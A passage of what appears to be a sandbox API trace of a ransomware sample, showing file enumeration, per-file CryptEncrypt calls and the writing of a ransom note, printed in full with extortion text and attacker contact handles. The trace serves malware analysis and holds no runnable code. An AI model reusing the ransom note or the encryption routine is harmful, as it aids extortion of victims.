Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0231.606] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.709] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe47dd5b4, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4a64ce1, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4a64ce1, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0231.709] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0231.710] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\#Decrypt#.txt") returned 74 [0231.710] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0231.710] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0231.711] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0231.712] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0231.712] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0231.713] CloseHandle (hObject=0x158) returned 1 [0231.713] GetProcessHeap () returned 0x780000 [0231.713] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0231.713] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92f4e4a1, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x92f4e4a1, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x92f9a75d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x186b84, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="FlickAnimation.avi", cAlternateFileName="")) returned 1 [0231.713] lstrcmpiW (lpString1="FlickAnimation.avi", lpString2="Windows") returned -1 [0231.713] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 73 [0231.713] StrStrIW (lpFirst="FlickAnimation.avi", lpSrch=".horseleader") returned 0x0 [0231.713] lstrcmpW (lpString1="FlickAnimation.avi", lpString2="#Decrypt#.txt") returned 1 [0231.713] lstrcmpW (lpString1="FlickAnimation.avi", lpString2="_uninstalling_.png") returned 1 [0231.713] lstrlenW (lpString=".testttjffg") returned 11 [0231.713] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpSrch=".testttjffg") returned 0x0 [0231.713] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0231.713] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0231.714] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.714] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c53a9c4, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5c53a9c4, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe29c9700, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xe2800, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="FlickLearningWizard.exe", cAlternateFileName="")) returned 1 [0231.714] lstrcmpiW (lpString1="FlickLearningWizard.exe", lpString2="Windows") returned -1 [0231.714] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe") returned 78 [0231.714] StrStrIW (lpFirst="FlickLearningWizard.exe", lpSrch=".horseleader") returned 0x0 [0231.714] lstrcmpW (lpString1="FlickLearningWizard.exe", lpString2="#Decrypt#.txt") returned 1 [0231.714] lstrcmpW (lpString1="FlickLearningWizard.exe", lpString2="_uninstalling_.png") returned 1 [0231.714] lstrlenW (lpString=".testttjffg") returned 11 [0231.714] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe", lpSrch=".testttjffg") returned 0x0 [0231.714] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0231.714] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0231.715] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flicklearningwizard.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.715] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98159680, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98159680, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0231.715] lstrcmpiW (lpString1="fr-FR", lpString2="Windows") returned -1 [0231.715] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR") returned 60 [0231.715] lstrcmpW (lpString1="fr-FR", lpString2=".") returned 1 [0231.715] lstrcmpW (lpString1="fr-FR", lpString2="..") returned 1 [0231.715] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0231.715] GetProcessHeap () returned 0x780000 [0231.715] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0231.715] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*") returned 62 [0231.715] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98159680, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98159680, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0231.716] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0231.716] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\.") returned 62 [0231.716] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0231.716] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98159680, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98159680, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0231.716] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0231.716] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\..") returned 63 [0231.716] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0231.716] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0231.716] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8311729d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8311729d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8311729d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0231.716] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0231.716] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui") returned 76 [0231.716] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0231.716] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0231.716] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0231.716] lstrlenW (lpString=".testttjffg") returned 11 [0231.716] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0231.716] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0231.716] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0231.716] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.716] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8311729d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8311729d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8311729d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0231.716] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0231.717] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\#Decrypt#.txt") returned 74 [0231.717] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0231.717] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0231.717] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0231.719] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0231.719] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0231.719] CloseHandle (hObject=0x158) returned 1 [0231.719] GetProcessHeap () returned 0x780000 [0231.719] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0231.719] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="fsdefinitions", cAlternateFileName="FSDEFI~1")) returned 1 [0231.719] lstrcmpiW (lpString1="fsdefinitions", lpString2="Windows") returned -1 [0231.719] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions") returned 68 [0231.719] lstrcmpW (lpString1="fsdefinitions", lpString2=".") returned 1 [0231.719] lstrcmpW (lpString1="fsdefinitions", lpString2="..") returned 1 [0231.719] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0231.719] GetProcessHeap () returned 0x780000 [0231.719] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0231.719] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*") returned 70 [0231.720] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0231.748] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0231.748] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\.") returned 70 [0231.748] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0231.748] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0231.748] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0231.748] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\..") returned 71 [0231.748] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0231.748] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0231.748] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="auxpad", cAlternateFileName="")) returned 1 [0231.748] lstrcmpiW (lpString1="auxpad", lpString2="Windows") returned -1 [0231.748] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad") returned 75 [0231.748] lstrcmpW (lpString1="auxpad", lpString2=".") returned 1 [0231.748] lstrcmpW (lpString1="auxpad", lpString2="..") returned 1 [0231.748] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0231.748] GetProcessHeap () returned 0x780000 [0231.748] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0231.748] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\*") returned 77 [0231.748] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, 